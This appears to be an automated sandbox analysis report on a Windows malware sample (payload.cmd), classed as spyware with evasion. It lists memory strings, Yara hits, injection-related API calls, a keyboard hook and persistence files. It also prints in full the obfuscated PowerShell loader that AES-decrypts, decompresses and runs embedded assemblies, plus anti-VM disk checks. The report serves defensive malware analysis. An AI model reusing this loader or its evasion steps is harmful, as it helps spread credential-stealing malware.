Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000001D.00000002.2617048225.0000025785F60000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xGh
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.2076913027.000001908E0C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.7:49720 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5760, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Contains functionality to call native functions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB7A0C5D NtWriteVirtualMemory, 39_2_00007FFAAB7A0C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB7A0FE4 NtResumeThread, 39_2_00007FFAAB7A0FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB79DF98 NtUnmapViewOfSection, 39_2_00007FFAAB79DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB7A0F20 NtSetContextThread, 39_2_00007FFAAB7A0F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB79E078 NtUnmapViewOfSection, 39_2_00007FFAAB79E078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB7A0A3E NtUnmapViewOfSection, 39_2_00007FFAAB7A0A3E
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 41_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, 42_2_000001CA7D1E2C80
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW, 43_2_0000017D2DD52300
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D02C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue, 45_2_00000262F1D02C80
Creates files inside the system directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-9pdB1aHK
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_pvursesw.30i.ps1
Detected potential crypto function
Source: C:\Windows\System32\cmd.exe Code function: 20_3_000002527DEBCC94 20_3_000002527DEBCC94
Source: C:\Windows\System32\cmd.exe Code function: 20_3_000002527DEB23F0 20_3_000002527DEB23F0
Source: C:\Windows\System32\cmd.exe Code function: 20_3_000002527DEBCE18 20_3_000002527DEBCE18
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEED894 20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE2FF0 20_2_000002527DEE2FF0
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEEDA18 20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1D894 20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF12FF0 20_2_000002527DF12FF0
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1DA18 20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exe Code function: 21_3_00000286D7CECC94 21_3_00000286D7CECC94
Source: C:\Windows\System32\conhost.exe Code function: 21_3_00000286D7CE23F0 21_3_00000286D7CE23F0
Source: C:\Windows\System32\conhost.exe Code function: 21_3_00000286D7CECE18 21_3_00000286D7CECE18
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1D894 21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D12FF0 21_2_00000286D7D12FF0
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1DA18 21_2_00000286D7D1DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB79F659 39_2_00007FFAAB79F659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB79DD58 39_2_00007FFAAB79DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB79E329 39_2_00007FFAAB79E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB79FDE9 39_2_00007FFAAB79FDE9
Source: C:\Windows\System32\conhost.exe Code function: 40_3_000001D54780CE18 40_3_000001D54780CE18
Source: C:\Windows\System32\conhost.exe Code function: 40_3_000001D54780CC94 40_3_000001D54780CC94
Source: C:\Windows\System32\conhost.exe Code function: 40_3_000001D5478023F0 40_3_000001D5478023F0
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783DA18 40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783D894 40_2_000001D54783D894
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D547832FF0 40_2_000001D547832FF0
Source: C:\Windows\System32\dllhost.exe Code function: 41_3_000001EF091FCC94 41_3_000001EF091FCC94
Source: C:\Windows\System32\dllhost.exe Code function: 41_3_000001EF091F23F0 41_3_000001EF091F23F0
Source: C:\Windows\System32\dllhost.exe Code function: 41_3_000001EF091FCE18 41_3_000001EF091FCE18
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140001CF0 41_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002D4C 41_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140003204 41_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002434 41_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140001274 41_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922D894 41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF09222FF0 41_2_000001EF09222FF0
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922DA18 41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942D894 41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF09422FF0 41_2_000001EF09422FF0
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942DA18 41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_3_000001CA7D1BCE18 42_3_000001CA7D1BCE18
Source: C:\Windows\System32\winlogon.exe Code function: 42_3_000001CA7D1BCC94 42_3_000001CA7D1BCC94
Source: C:\Windows\System32\winlogon.exe Code function: 42_3_000001CA7D1B23F0 42_3_000001CA7D1B23F0
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1EDA18 42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1ED894 42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1E2FF0 42_2_000001CA7D1E2FF0
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21DA18 42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21D894 42_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D212FF0 42_2_000001CA7D212FF0
Source: C:\Windows\System32\lsass.exe Code function: 43_3_0000017D2DD2CE18 43_3_0000017D2DD2CE18
Source: C:\Windows\System32\lsass.exe Code function: 43_3_0000017D2DD2CC94 43_3_0000017D2DD2CC94
Source: C:\Windows\System32\lsass.exe Code function: 43_3_0000017D2DD223F0 43_3_0000017D2DD223F0
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5DA18 43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5D894 43_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD52FF0 43_2_0000017D2DD52FF0
Source: C:\Windows\System32\svchost.exe Code function: 44_3_0000022F4B9223F0 44_3_0000022F4B9223F0
Source: C:\Windows\System32\svchost.exe Code function: 44_3_0000022F4B92CE18 44_3_0000022F4B92CE18
Source: C:\Windows\System32\svchost.exe Code function: 44_3_0000022F4B92CC94 44_3_0000022F4B92CC94
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B922FF0 44_2_0000022F4B922FF0
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92DA18 44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92D894 44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B952FF0 44_2_0000022F4B952FF0
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95DA18 44_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95D894 44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CD23F0 45_3_00000262F1CD23F0
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CDCE18 45_3_00000262F1CDCE18
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CDCC94 45_3_00000262F1CDCC94
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CA23F0 45_3_00000262F1CA23F0
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CACE18 45_3_00000262F1CACE18
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CACC94 45_3_00000262F1CACC94
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CD2FF0 45_2_00000262F1CD2FF0
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDDA18 45_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDD894 45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D02FF0 45_2_00000262F1D02FF0
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0DA18 45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0D894 45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exe Code function: 46_3_0000023942AECE18 46_3_0000023942AECE18
Source: C:\Windows\System32\svchost.exe Code function: 46_3_0000023942AE23F0 46_3_0000023942AE23F0
Source: C:\Windows\System32\svchost.exe Code function: 46_3_0000023942AECC94 46_3_0000023942AECC94
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1DA18 46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B12FF0 46_2_0000023942B12FF0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1D894 46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe Code function: 47_3_000001EF056ACC94 47_3_000001EF056ACC94
Source: C:\Windows\System32\svchost.exe Code function: 47_3_000001EF056A23F0 47_3_000001EF056A23F0
Source: C:\Windows\System32\svchost.exe Code function: 47_3_000001EF056ACE18 47_3_000001EF056ACE18
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DD894 47_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056D2FF0 47_2_000001EF056D2FF0
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DDA18 47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570D894 47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF05702FF0 47_2_000001EF05702FF0
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570DA18 47_2_000001EF0570DA18
One or more processes crash
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2684
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: unknown Process created: Commandline size = 5417
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2684 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682 Jump to behavior
Yara signature match
Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5760, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.spyw.evad.winCMD@54/88@2/2
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 41_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 38_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 38_2_004017A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\6273870
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2332:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5760
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\2851471
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\364263
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1riomnp1.nuz.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
